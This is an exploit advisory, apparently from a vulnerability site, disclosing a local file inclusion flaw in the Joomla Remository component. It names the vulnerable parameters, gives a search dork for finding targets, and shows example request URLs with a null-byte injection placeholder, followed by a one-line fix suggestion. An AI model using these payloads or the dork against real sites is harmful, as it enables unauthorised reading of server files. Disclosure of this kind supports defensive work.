# Exploit Title: Joomla Component Remository (com_remository) LFI # Date: 01/06/10 # Author: _Mlk_ # Software Link: http://bugsec.googlecode.com/files/Joomla_com_remository.zip # Version: all # Tested on: unix*,win32* # CVE : null Joomla Component Remository (com_remository) - Local File Inclusion Vulnerability ############################################################################################################## [+] Discovered by : _mlk_ (Renan) [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs [+] Homepages : http://code.google.com/p/bugsec/ <> http://botecounix.com.br/blog/ <> http://c0d3rs.wordpress.com/ [+] Location : Porto Alegre - RS, Brasil (or Brazil) [+] original file: http://bugsec.googlecode.com/files/Joomla_com_remository.zip ############################################################################################################## [-] Information [?] Script : Remository [?] Vendor : http://remository.com/ [?] Dork/String : \"index.php?option=com_remository\" / \"com_remository\" [?] Download : http://remository.com/downloads/ [?] Date : 01, July 2010 ############################################################################################################## [*] Parameters vuls : view Itemid controller task ############################################################################################################## [*] Example : http://localhost/index.php?option=com_remository&task=[LFI]%00 http://localhost/[PATH]/index.php?option=com_remository&view=[LFI]%00 ############################################################################################################## [*] Solution : Make a function that scans and reads the inclusion of paths and chars(%00) . ############################################################################################################## [~] Agradecimentos : Deus , Familiares , Amigos e Tricolor Gaúcho (Grémio) . Em especial \"Cooler_\" . ##############################################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论